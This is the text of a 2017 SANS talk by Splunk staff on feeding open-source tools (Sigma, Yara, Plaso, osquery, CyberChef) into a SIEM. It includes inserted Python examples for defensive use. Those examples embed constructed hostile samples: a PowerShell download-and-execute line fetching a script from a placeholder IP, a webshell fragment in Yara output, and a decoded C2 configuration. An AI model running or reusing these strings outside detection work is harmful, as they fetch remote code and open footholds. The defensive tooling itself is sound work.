Ten(?) Holiday Gift Ideas for the SOC Who Has Everything
Dave Herrald and Ryan Kovar
SANS SIEM & Tactical Analytics Summit, November 2017
Disclaimer
During the course of this presentation, we may make forward looking statements regarding
future events or the expected performance of the company. I often lie. Maybe this is a lie.
Wik Alsø wik Alsø alsø wik Wi nøt trei a høliday in Sweden this yër? See the løveli lakes
The wøndërful telephøne system And mäni interesting furry animals The characters and
incidents portrayed and the names used in this Presentation are fictitious and any similarity
to the names, characters, or history of any person is entirely accidental and unintentional.
Signed RICHARD M. NIXON Including the majestik møøse A Møøse once bit my Marcus...
No realli! He was Karving his initials on the møøse with the sharpened end of an
interspace tøøthbrush given him by Svenge – his brother-in-law – a Canadian dentist and
star of many Norwegian møvies: "The Høt Hands of an Canadian Dentist", "Fillings of
Passion", "The Huge Mølars of Horst Nordfink"... In addition, any information about our
roadmap outlines our general product direction and is subject to change at any time
without notice. Splunk undertakës no øbligation either to develøp the features or
functionality described or to include any such feature or functionality in a future release.
# whoami > Ryan Kovar
Staff Security Strategist, Minister of the OODAloopers
CISSP, MSc (Dist)
@meansec
• 17 years of cyber security experience
• Current role on Security Practice team focuses on incident/breach response, threat intelligence, and research
• Also investigating why printers are so insubordinate ಠ_ಠ
# whoami > Dave Herrald
Security Architect @splunk
CISSP, GIAC G*, GSE #79
@daveherrald
- 20+ years IT and security
- Information security officer, security architect, pen tester, consultant, SE, system/network engineer
- Former SANS Mentor
- Co-creator of Splunk Boss of the SOC
We use Splunk
But you don’t have to!
On the shoulders of giants
Florian Roth
• Twitter: @cyb3rop
• GitHub: https://github.com/Neo23x0
• Currently employed at: https://www.bsk-consulting.de
• Sigma author
• Yara signature creator extraordinaire
Expectations…
Test your SIEM with Realistic Data
BOTS Data Is Free
• Splunk Boss of the SOC is a realistic, blue-team CTF
• BOTS Version 1 debuted in September 2016
• Data set has been open-sourced (CC0 license)
• Available as pre-indexed Splunk data, JSON, and CSV
https://github.com/daveherrald/botsv1
BOTS Data Is Realistic
• Realistic attack data
• Realistic background noise
• Includes 22 data types
• Windows events
• Microsoft Sysmon
• Windows registry
• Wire data (HTTP, DNS, DHCP, etc.)
• Suricata
• Firewall
Open source detection rules
SIGMA
Generic Signature Format for SIEM
• Developed by Florian Roth and Thomas Patzke
• https://github.com/Neo23x0/sigma
What’s in the box?
• Rule specification
• Open repository of signatures
• A Python converter for different SIEM systems
SIGMA – Preparing to test against BOTSv1 data
• Focus on Sysmon data for this test
- About 46 of 148 Sigma rules at time of test
• Need to convert Sigma Sysmon rules to Splunk searches
• I used sigmac.py manually, included with Sigma
• Recommend the excellent TA-Sigma-Searches add-on for Splunk
- https://github.com/dstaulcu/TA-Sigma-Searches
- Finished product
- Also includes the PowerShell wrapper for sigmac.py that takes care of a lot of messy details
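To make the conversion step concrete, here is an added example (not sigmac, and not code from the talk) that does the core of what sigmac's Splunk backend does for a process-creation rule: each Sigma search identifier becomes a parenthesised AND of field terms, a list of values becomes an OR, and the rule's condition is expanded with Splunk's AND/OR/NOT. The rule, the Sysmon field mapping and the sourcetype are all constructed assumptions to check against your own Sysmon data; real rules are YAML and would be loaded with yaml.safe_load().

```python
"""Sigma rule -> Splunk search, reduced to the core of what sigmac's Splunk
backend does. Added example for this page, not sigmac itself.

The rule below is a constructed stand-in shaped like the Sigma Sysmon
process-creation rules (an Office parent spawning a shell); it is not
copied from the Sigma repository. Real rules are YAML and would be loaded
with yaml.safe_load(); a dict literal keeps this runnable without PyYAML.
"""
import re

RULE = {  # constructed
    "title": "Office Product Spawning Shell (constructed)",
    "logsource": {"product": "windows", "service": "sysmon"},
    "detection": {
        "selection": {
            "EventID": 1,
            "ParentImage": ["*\\WINWORD.EXE", "*\\EXCEL.EXE", "*\\POWERPNT.EXE"],
            "Image": ["*\\cmd.exe", "*\\powershell.exe", "*\\wscript.exe"],
        },
        "filter": {"CommandLine": "*\\KnownGood\\*"},
        "condition": "selection and not filter",
    },
    "level": "high",
}

# Sigma uses Sysmon's own field names; the Splunk add-on for Sysmon exposes
# some under different names. This mapping is an assumption: check it
# against the field names your Sysmon sourcetype actually extracts.
FIELD_MAP = {"Image": "process", "ParentImage": "parent_process",
             "CommandLine": "cmdline", "EventID": "EventCode"}
SYSMON_SOURCETYPE = "XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"  # assumed


def quote(value):
    """One Sigma value as a Splunk term. Sigma's * and ? are the wildcards
    Splunk uses too, so they pass through; strings are quoted so the
    backslashes in Windows paths survive."""
    if isinstance(value, int):
        return str(value)
    return '"' + str(value).replace('"', '\\"') + '"'


def field_expr(field, values):
    """A list of values for one field is an OR of alternatives."""
    name = FIELD_MAP.get(field, field)
    vals = values if isinstance(values, list) else [values]
    terms = [f"{name}={quote(v)}" for v in vals]
    return terms[0] if len(terms) == 1 else "(" + " OR ".join(terms) + ")"


def map_expr(mapping):
    """Fields inside one search identifier are ANDed together."""
    return "(" + " AND ".join(field_expr(f, v) for f, v in mapping.items()) + ")"


def convert(rule, index="botsv1", sourcetype=SYSMON_SOURCETYPE):
    """Substitute each search identifier in the condition with its boolean
    form. Only and/or/not and parentheses are handled, which covers the
    process-creation rules tested in the talk; aggregations ('count() by')
    and 'all of them' are not."""
    det = rule["detection"]
    ids = {k: map_expr(v) for k, v in det.items() if k != "condition"}
    out = []
    for tok in re.findall(r"\(|\)|\w+", det["condition"]):
        if tok in ids:
            out.append(ids[tok])
        elif tok in ("and", "or", "not"):
            out.append(tok.upper())
        elif tok in "()":
            out.append(tok)
        else:
            raise ValueError(f"unsupported condition token: {tok!r}")
    return f'index={index} sourcetype="{sourcetype}" ' + " ".join(out)


if __name__ == "__main__":
    print(convert(RULE))
```

The resulting search is what you would paste into a saved search or let TA-Sigma-Searches manage for you; the field mapping is the part that breaks most often, so test each converted rule against known-positive events in BOTS before trusting it in production.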
SIGMA – Test against BOTSv1 data set
Success!
• sysmon_office_macro_cmd.yml
• sysmon_office_shell.yml
• sysmon_susp_execution_path_webserver.yml
• sysmon_susp_net_execution.yml
• sysmon_webshell_spawn.yml
Follow-up
• More hits with other Sigma rules?
• Contribute new rules to Sigma
Automating your first 15 minutes
The Practice of Network Security Monitoring, Richard Bejtlich
Then one day you have an “incident”
Automate Local Yara Scan
Yara on the local host
Now run Yara on the local host
*thanks Florian!
Yara in da SIEM
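The slides for this step are screenshots, so here is an added example (not the speakers' code) of the glue between "Yara on the local host" and "Yara in da SIEM": run yara with `-r -s -m`, turn its text output into one JSON event per match, and write those lines to a file the Universal Forwarder (or any shipper) monitors. The output layout is yara's (a header line per match, then one line per matched string when -s is given); the sample output below is constructed, not from a real scan.

```python
"""Parse yara's text output into one JSON event per match, ready for a
file the Universal Forwarder monitors (or any other SIEM shipper).
Added example; not the speakers' code. It assumes yara is run as
`yara -r -s -m RULES TARGET`, whose output is one header line per match
("RULE [meta] PATH") followed, with -s, by one line per matched string
("0xOFFSET:$id: data"). SAMPLE below is constructed, not real scan output.
"""
import json
import re
import socket
import subprocess
from datetime import datetime, timezone

MATCH_RE = re.compile(r"^(?P<rule>\S+)(?: \[(?P<meta>.*)\])? (?P<path>.+)$")
STRING_RE = re.compile(r"^(?P<offset>0x[0-9a-fA-F]+):(?P<ident>\$\w*): ?(?P<data>.*)$")
META_RE = re.compile(r'(\w+)=(?:"((?:[^"\\]|\\.)*)"|([^,]+))')

SAMPLE = """Webshell_Generic [author="constructed",date="2017-11-01",score=70] /var/www/html/uploads/cmd.php
0x1f:$php: <?php
0x5a:$eval: eval($_POST[
Office_Dropper_Macro /home/analyst/invoice.docm
"""


def parse_meta(text):
    """author="x",score=70 -> {"author": "x", "score": "70"}"""
    return {k: (q or b) for k, q, b in META_RE.findall(text or "")}


def parse_yara_output(text, scanner_host, now=None):
    """Fold each match header plus its following string lines into one event.
    Without -s there are no string lines and every header is its own event."""
    ts = (now or datetime.now(timezone.utc)).isoformat()
    events, current = [], None
    for line in text.splitlines():
        s = STRING_RE.match(line)
        if s and current is not None:
            current["strings"].append(
                {"offset": s["offset"], "id": s["ident"], "data": s["data"]})
            continue
        m = MATCH_RE.match(line)
        if m:
            current = {"time": ts, "host": scanner_host, "rule": m["rule"],
                       "path": m["path"], "meta": parse_meta(m["meta"]), "strings": []}
            events.append(current)
    return events


def to_jsonl(events):
    """One JSON object per line: the shape a SIEM file monitor ingests cleanly."""
    return "".join(json.dumps(e) + "\n" for e in events)


def run_yara(rules, target):
    """Invoke yara recursively with strings and metadata. Exit status 0 means
    the scan completed (with or without matches); anything else is an error
    such as bad rules or an unreadable target. Not executed in this example."""
    res = subprocess.run(["yara", "-r", "-s", "-m", rules, target],
                         capture_output=True, text=True, check=False)
    if res.returncode != 0:
        raise RuntimeError(res.stderr.strip() or f"yara exited {res.returncode}")
    return res.stdout


if __name__ == "__main__":
    # Real use: out = run_yara("/opt/rules/index.yar", "/var/www"); here the constructed sample.
    print(to_jsonl(parse_yara_output(SAMPLE, socket.gethostname())), end="")
```

Keeping the matched strings and offsets in the event is what lets an analyst triage the hit from the SIEM without first pulling the file; hash the file and add that too if your rule set is noisy, so repeat hits on the same sample can be deduplicated.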
Integration into the DFIR world
Supertimeline in Excel Template
Supertimeline in a SIEM
• Store and search over multiple timelines
• Extract the Supertimeline Source Types
• Specify time ranges
• Ad-hoc search
• Familiar color coding
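The bullets above are what the Plaso Splunk apps in the Resources slide give you inside the SIEM. As an added example (not the apps' code), the same steps over psort's l2tcsv export in plain Python: load the timeline, list the source types that contributed, slice a time window, and pivot on a keyword. The header row is l2tcsv's 17 columns; the three data rows are constructed to resemble NTFS USN journal, Windows event log and registry entries. The code refuses a timeline whose timezone column is not UTC, because timelines from several hosts only line up when stored together if psort was run with a UTC output time zone.

```python
"""Load a plaso supertimeline exported by psort in l2tcsv format, list the
source types it contains, and slice it by time range or keyword: the steps
the slides describe, done in plain Python. Added example; not the speakers'
Splunk apps. The header row is l2tcsv's 17 columns; the three data rows are
constructed to look like NTFS USN, Windows event log and registry entries.
"""
import csv
import io
from collections import Counter
from datetime import datetime, timezone

SAMPLE = """date,time,timezone,MACB,source,sourcetype,type,user,host,short,desc,version,filename,inode,notes,format,extra
11/15/2017,13:02:11,UTC,M...,FILE,NTFS USN change,Content Modification Time,-,ws01,C:/Windows/Temp/update.exe,"Update reason: DATA_EXTEND",2,TSK:/Windows/Temp/update.exe,85204,-,usnjrnl,-
11/15/2017,13:02:12,UTC,...B,EVT,WinEVTX,Creation Time,-,ws01,[4688 / 0x1250] Source Name: Microsoft-Windows-Security-Auditing,"[4688 / 0x1250] Source Name: Microsoft-Windows-Security-Auditing Strings: ['S-1-5-18', 'WS01$', 'C:\\Windows\\Temp\\update.exe']",2,TSK:/Windows/System32/winevt/Logs/Security.evtx,0,-,winevtx,-
11/15/2017,13:05:40,UTC,.A..,REG,Registry Key,Last Access Time,-,ws01,[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run] Updater: C:\\Windows\\Temp\\update.exe,"[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run] Updater: C:\\Windows\\Temp\\update.exe",2,TSK:/Windows/System32/config/SOFTWARE,0,-,winreg/winreg_default,-
"""

MACB = {"M": "modified", "A": "accessed", "C": "changed", "B": "birth"}


def _utc(value):
    """Accept a datetime or an ISO 'YYYY-MM-DDTHH:MM:SS' string as UTC."""
    if isinstance(value, str):
        value = datetime.fromisoformat(value)
    return value if value.tzinfo else value.replace(tzinfo=timezone.utc)


def load_l2tcsv(text):
    """Rows as dicts plus a 'ts' datetime and expanded MACB flags. l2tcsv
    writes MM/DD/YYYY dates and a separate timezone column; insist on UTC
    so timelines from several hosts line up when stored together."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        if row["timezone"] != "UTC":
            raise ValueError(f"expected a UTC timeline, got {row['timezone']!r}; "
                             "re-run psort with a UTC output time zone")
        when = datetime.strptime(f"{row['date']} {row['time']}", "%m/%d/%Y %H:%M:%S")
        row["ts"] = when.replace(tzinfo=timezone.utc)
        row["macb"] = [MACB[c] for c in row["MACB"] if c in MACB]
        rows.append(row)
    return rows


def sourcetypes(rows):
    """'Extract the Supertimeline Source Types': which parsers contributed what."""
    return Counter(r["sourcetype"] for r in rows)


def in_range(rows, start, end):
    """'Specify time ranges': inclusive window, ordered by time."""
    lo, hi = _utc(start), _utc(end)
    return sorted((r for r in rows if lo <= r["ts"] <= hi), key=lambda r: r["ts"])


def search(rows, needle):
    """'Ad-hoc search': case-insensitive match on description or filename."""
    n = needle.lower()
    return [r for r in rows if n in r["desc"].lower() or n in r["filename"].lower()]


if __name__ == "__main__":
    timeline = load_l2tcsv(SAMPLE)
    print(sourcetypes(timeline))
    for r in search(timeline, "update.exe"):
        print(r["ts"].isoformat(), r["source"], r["macb"], r["short"])
```

The same three operations map directly onto SIEM primitives (a sourcetype field, the time picker, free-text search), which is why the Plaso apps feel natural once the CSV is indexed; the one thing to settle before indexing is the time zone, since mixing UTC and local-time exports silently misorders events.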
Resources
Supertimeline (Plaso) Splunk Apps
• https://github.com/daveherrald/TA_plaso-add-on-for-splunk
• https://github.com/daveherrald/SA_plaso-app-for-splunk
Earlier work from Nick Klein
• https://www.youtube.com/watch?v=xe0qJriD7aM
Labeling your gifts rules
Too many damn rules!
SIEM rule creep
Make a SIEM rule taxonomy!
Don’t reinvent the wheel
• “4” indicates it is in the 4th stage of the kill chain
• “002” indicates it is the 2nd rule written in the “4” category
• “EXP” indicates it is in the “Exploit” category
• Lastly, the name of the rule
https://conf.splunk.com/files/2016/slides/maturing-workdays-soc-with-splunk.pdf
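An added example (not from the Workday deck) of putting that naming scheme to work: parse and validate IDs of the form stage-sequence-category-name, allocate the next sequence number within a stage, and count rules per kill-chain stage so the gaps and the pile-ups are visible. The separator, the three-digit sequence width and every category code other than EXP are assumptions; the stage numbers follow the Lockheed Martin kill chain, so EXP must sit under stage 4 and a rule filed as 3-...-EXP is rejected.

```python
"""Encode, validate and allocate SIEM rule IDs in the kill-chain taxonomy
the slide describes: <stage>-<seq>-<category>-<name>. Added example, not
the Workday deck's material. Assumptions: '-' as the separator, three-digit
sequence numbers, and the category codes other than EXP (the page only
names EXP); the stage numbers follow the Lockheed Martin kill chain, so
stage 4 is Exploitation and EXP must sit under 4.
"""
import re
from collections import Counter

STAGES = {1: "Reconnaissance", 2: "Weaponization", 3: "Delivery", 4: "Exploitation",
          5: "Installation", 6: "Command and Control", 7: "Actions on Objectives"}
# Codes other than EXP are assumed for illustration.
CATEGORY_STAGE = {"REC": 1, "WEA": 2, "DEL": 3, "EXP": 4, "INS": 5, "C2": 6, "AOO": 7}
ID_RE = re.compile(r"^(?P<stage>[1-7])-(?P<seq>\d{3})-(?P<cat>[A-Z0-9]{2,3})-(?P<name>\S.*)$")


def parse_rule_id(rule_id):
    """'4-002-EXP-Office Spawning Shell' -> fields. Rejects a category filed
    under the wrong stage, which is how mislabelled rules creep in."""
    m = ID_RE.match(rule_id)
    if not m:
        raise ValueError(f"not a taxonomy id: {rule_id!r}")
    stage, cat = int(m["stage"]), m["cat"]
    if CATEGORY_STAGE.get(cat) != stage:
        raise ValueError(f"{rule_id!r}: {cat} belongs to stage {CATEGORY_STAGE.get(cat)}, not {stage}")
    return {"stage": stage, "seq": int(m["seq"]), "category": cat, "name": m["name"]}


def next_rule_id(existing, category, name):
    """Allocate the next sequence number within the category's stage."""
    stage = CATEGORY_STAGE[category]
    used = [p["seq"] for p in map(parse_rule_id, existing) if p["stage"] == stage]
    seq = max(used, default=0) + 1
    if seq > 999:
        raise OverflowError(f"stage {stage} has no free sequence numbers")
    return f"{stage}-{seq:03d}-{category}-{name}"


def coverage(existing):
    """Rules per kill-chain stage: zeros are detection gaps, large numbers
    are where to look for redundant rules."""
    counts = Counter(parse_rule_id(i)["stage"] for i in existing)
    return {stage: counts.get(stage, 0) for stage in STAGES}


if __name__ == "__main__":
    rules = ["4-001-EXP-Office Macro Spawns cmd", "4-002-EXP-Webshell Spawn",
             "3-001-DEL-Macro Document Delivered"]
    print(next_rule_id(rules, "EXP", "Suspicious Net Execution"))
    for stage, n in coverage(rules).items():
        print(f"{stage} {STAGES[stage]:<22} {n}")
```

Run coverage() over the saved-search names your SIEM exports and the empty stages become the shopping list for new rules, while a stage with dozens of near-identical names is where consolidation starts.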
Endpoint Data On-Demand
Current osquery Capability with Splunk
• Schedule osquery queries
• Log results locally
• Monitor with Universal Forwarder
• Analyze with Splunk
• We include this in BOTS v2 if you want to see it in action
• https://splunkbase.splunk.com/app/3278/
What’s new?
Osquery clients directly connected to Splunk
• Multiple endpoints.
• Active connections.
• Windows, Linux, OSX
So what?
Your analysts can now query an endpoint, on-demand…
Choose from saved queries, like Listening Ports
Any connected endpoint
Run the query on the endpoints you choose.
With results available in seconds…
From all the queried clients…
Query results are stored for future analysis
Details
• No Splunk software on the endpoint, osquery only
• TLS transport
• Collects both on-demand and scheduled query results
• GOTO: Disclaimer
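What "osquery clients directly connected" and "TLS transport" rest on is osquery's TLS remote API: the agent enrolls with a shared secret, polls a distributed-read endpoint for queries, and posts rows back to a distributed-write endpoint. The added example below (not the Splunk app shown in the talk) implements the server side of that exchange as plain handlers, with the agent's messages constructed to follow the shapes in osquery's TLS plugin documentation. It assumes TLS is terminated in front of the handlers, the enroll secret is a placeholder, and the node_key it issues is what authenticates every later request, so it is random and compared in constant time.

```python
"""Server side of osquery's TLS remote API, reduced to what an on-demand
query needs: enroll, distributed/read, distributed/write. Added example; it
is not the Splunk app shown in the talk. Message shapes follow osquery's
TLS plugin documentation; the enroll secret, host names and result rows are
constructed. TLS is assumed to be terminated in front of these handlers (a
deployment puts them behind HTTPS; osquery's TLS plugins will not talk
plaintext).
"""
import hmac
import secrets
import time

ENROLL_SECRET = "constructed-enroll-secret-rotate-me"  # assumed; given to agents out of band


class DistributedServer:
    def __init__(self, enroll_secret=ENROLL_SECRET):
        self.secret = enroll_secret.encode()
        self.nodes = {}      # node_key -> host details from enrollment
        self.pending = {}    # node_key -> {query_id: sql}
        self.results = []    # every returned row, kept for later analysis
        self._counter = 0

    def enroll(self, body):
        """POST /enroll: agent sends enroll_secret, host_identifier, host_details.
        Compare the secret in constant time and hand back a random node_key
        that authenticates every later request from this agent."""
        presented = str(body.get("enroll_secret", "")).encode()
        if not hmac.compare_digest(presented, self.secret):
            return {"node_invalid": True}
        node_key = secrets.token_hex(32)
        os_version = body.get("host_details", {}).get("os_version", {})
        self.nodes[node_key] = {"host": body.get("host_identifier"),
                                "platform": os_version.get("platform", "unknown")}
        return {"node_key": node_key}

    def queue(self, sql, node_keys=None):
        """Analyst action: run sql on the chosen endpoints (default: all
        enrolled). Returns the query id the results will carry."""
        self._counter += 1
        qid = f"q{self._counter}"
        for key in node_keys or list(self.nodes):
            self.pending.setdefault(key, {})[qid] = sql
        return qid

    def distributed_read(self, body):
        """POST /distributed/read: agent polls with its node_key; reply with
        {"queries": {id: sql}}. node_invalid makes the agent re-enroll."""
        key = body.get("node_key")
        if key not in self.nodes:
            return {"node_invalid": True}
        return {"queries": self.pending.pop(key, {})}

    def distributed_write(self, body):
        """POST /distributed/write: {"node_key", "queries": {id: [rows]},
        "statuses": {id: code}} with code 0 meaning the query succeeded."""
        key = body.get("node_key")
        if key not in self.nodes:
            return {"node_invalid": True}
        node = self.nodes[key]
        for qid, rows in body.get("queries", {}).items():
            status = body.get("statuses", {}).get(qid, 0)
            for row in rows:
                self.results.append({"time": time.time(), "query_id": qid,
                                     "host": node["host"], "platform": node["platform"],
                                     "status": status, "columns": row})
        return {}


def demo():
    """One full exchange with constructed agent messages."""
    srv = DistributedServer()
    node_key = srv.enroll({"enroll_secret": ENROLL_SECRET, "host_identifier": "ws01",
                           "platform_type": "2",
                           "host_details": {"os_version": {"platform": "windows"}}})["node_key"]
    qid = srv.queue("SELECT pid, port, protocol, address FROM listening_ports WHERE port < 1024;")
    read = srv.distributed_read({"node_key": node_key})
    # The agent runs the query and posts the rows back (constructed rows).
    srv.distributed_write({"node_key": node_key,
                           "queries": {qid: [{"pid": "4", "port": "445", "protocol": "6", "address": "0.0.0.0"}]},
                           "statuses": {qid: 0}})
    return srv, qid, read


if __name__ == "__main__":
    server, _, _ = demo()
    print(server.results)
```

Results arrive on the agent's next poll interval, which is why the slides say "seconds" rather than "instantly"; store them with the query id and host so the same saved query run a week later can be diffed against today's answer.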
TIP’ing your SIEM
OK… So what’s a TIP again?
An open source malware and threat repository that leverages other open source software to create a unified tool for analysts and security experts engaged in threat defense.
Malware Information Sharing Platform (MISP) allows organizations to share information about malware and their indicators. MISP users benefit from the collaborative knowledge about existing malware or threats.
Yeti is a platform meant to organize observables, indicators of compromise, TTPs, and knowledge on threats in a single, unified repository.
“Threat Intelligence Platform”
A SIEM acting as a TIP
The Practice of Network Security Monitoring, Richard Bejtlich
Optimizing your SIEM Analysis with CyberChef
• Developed and maintained by GCHQ
• Open source, Apache 2.0 License and Crown Copyright
• https://github.com/gchq/CyberChef
• Convert virtually any data format to any other
• Web based
• Processing is performed locally using JavaScript in the browser
• Easy to use, powerful, programmable, extensible
CyberChef Integrated with Your SIEM
CyberChef Recipes (encodings aplenty and more)
CyberChef Recipes (Holiday Playlist)
Encodings: Base64, Hexdump, URL/HTML Entity
Encryption: AES, 3DES, RC4, XOR
Public Key Crypto: Parse X.509, PEM to DER
Logical: AND/OR/NOT/XOR, Bit shift, Endian flip
Networking: Parse UA string, Parse URI, NETBIOS encoding
Languages: Dozens, Unicode unescaping
Text Manipulation: Upper, lower; Sort, count, uniq; Head, tail; Regex
Extractions: IP, File names, Domains, EXIF
Compression: Zip, gzip, bz2, Tar
Hashing: SHA1/SHA2/MD5, HMAC, CRC
CyberChef Resources
About: https://www.gchq.gov.uk/news-article/cyberchef-cyber-swiss-army-knife
Code: https://github.com/gchq/CyberChef
Demo: https://gchq.github.io/CyberChef/
Splunk SIEM Integration: https://github.com/daveherrald/TA-cyberchef
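Two pieces of the CyberChef-beside-the-SIEM workflow, as an added example that is not the TA-cyberchef add-on's code: deep_link() builds a URL that opens CyberChef with a recipe and an input already loaded, which is what a SIEM workflow action can hand an analyst, and run_recipe() replays the same kind of operation chain (From Base64, From Hex, XOR, Gunzip, Decode text, Extract IPs from the playlist above) in Python for cases where the decode should happen server-side. The deep-link layout (#recipe=...&input=<base64>) is what the public CyberChef build exports from "Save recipe"; export recipe strings from your own CyberChef rather than hand-writing them, since argument labels vary between versions. Both payloads are constructed.

```python
"""Two pieces of the CyberChef-beside-the-SIEM workflow. Added example; it is
not the TA-cyberchef add-on's code. deep_link() builds a URL that opens
CyberChef with a recipe and input preloaded, which is what a SIEM workflow
action can hand an analyst; run_recipe() replays the same kind of operation
chain in Python for cases where the decode should happen server-side.
The deep-link layout (#recipe=...&input=<base64>) is what the public
CyberChef build exports from "Save recipe"; export the recipe string from
your own CyberChef rather than hand-writing it, since argument labels vary
between versions. All payloads below are constructed.
"""
import base64
import gzip
import re
import urllib.parse

CYBERCHEF = "https://gchq.github.io/CyberChef/"   # or an internal copy
_RECIPE_SAFE = "(),'/"   # left unescaped to match CyberChef's own exported links (assumed)


def deep_link(recipe, data, base=CYBERCHEF):
    """recipe: CyberChef compact syntax, e.g.
    "From_Base64('A-Za-z0-9+/=',true)Decode_text('UTF-16LE (1200)')".
    data: raw bytes. The input rides Base64-encoded in the URL fragment, so
    it is never sent to the server hosting CyberChef, but it does land in
    browser history: host CyberChef internally for sensitive samples."""
    payload = base64.b64encode(data).decode()
    return (f"{base}#recipe={urllib.parse.quote(recipe, safe=_RECIPE_SAFE)}"
            f"&input={urllib.parse.quote(payload, safe='')}")


def _xor(data, key):
    """Repeating-key XOR, as in CyberChef's XOR operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _text(d):
    return d if isinstance(d, str) else d.decode("latin-1")


# Local stand-ins for a few CyberChef operations, keyed by operation name.
OPS = {
    "From_Base64": lambda d: base64.b64decode(d),
    "From_Hex": lambda d: bytes.fromhex(_text(d).replace(" ", "")),
    "Gunzip": gzip.decompress,
    "XOR": _xor,
    "Decode_text": lambda d, encoding: d.decode(encoding),
    "Extract_IP_addresses": lambda d: re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", _text(d)),
}


def run_recipe(steps, data):
    """steps: [(operation, *args)], applied in order like a CyberChef recipe."""
    for name, *args in steps:
        data = OPS[name](data, *args)
    return data


# Constructed sample 1: a PowerShell -EncodedCommand style blob (Base64 of UTF-16LE).
PS_PLAIN = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
PS_BLOB = base64.b64encode(PS_PLAIN.encode("utf-16le"))
PS_RECIPE = [("From_Base64",), ("Decode_text", "utf-16le")]
PS_RECIPE_CC = "From_Base64('A-Za-z0-9+/=',true)Decode_text('UTF-16LE (1200)')"

# Constructed sample 2: gzip'd config, XOR'd with a one-byte key, hex-encoded.
CFG_PLAIN = b"c2=192.0.2.10:8443\nsleep=60\n"
CFG_BLOB = _xor(gzip.compress(CFG_PLAIN), b"\x41").hex()
CFG_RECIPE = [("From_Hex",), ("XOR", b"\x41"), ("Gunzip",), ("Extract_IP_addresses",)]

if __name__ == "__main__":
    print(run_recipe(PS_RECIPE, PS_BLOB))
    print(run_recipe(CFG_RECIPE, CFG_BLOB))
    print(deep_link(PS_RECIPE_CC, PS_BLOB))
```

Because CyberChef processes everything in the browser, the link is safe to point at the public instance for non-sensitive encodings; for anything from an incident, serve the same static files from an internal host and change CYBERCHEF accordingly.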
Takeaways
• Get some “SIEMspiration”!
• Think outside of “Alerts and Events”
• Use third-party open source tools to “accelerate” your bicycle
• Automate the mundane. Investigate the interesting.
Contact info
Dave Herrald
dherrald@splunk.com
@daveherrald
Ryan Kovar
rkovar@splunk.com
@meansec
http://blogs.splunk.com/author/rkovar

Editor's Notes

  1. Learned System Administration in the US Navy. Worked in the UK/US in public/private sector. Most recently at DARPA using Splunk. Has a master's degree from University of Westminster. Focuses on incident response, threat intel, dry humor.
  2. Some gifts are better than others: Car vs SOC(k). “Abstract different than talk? Why? Research! People needed the stuff we talk about here more than they needed ADPS (another damn (powershell|python) script).” “We’re here to inspire you, not give you answers.”
  3. Forensics detail can add context to a SIEM investigation. Triggering forensics gathering as a workflow.
  4. I constantly hear that customers want to manage their threat intelligence with their SIEM. They want their SIEM to act as a TIP.
  5. But… it never ends up well…. Think about using TIPs.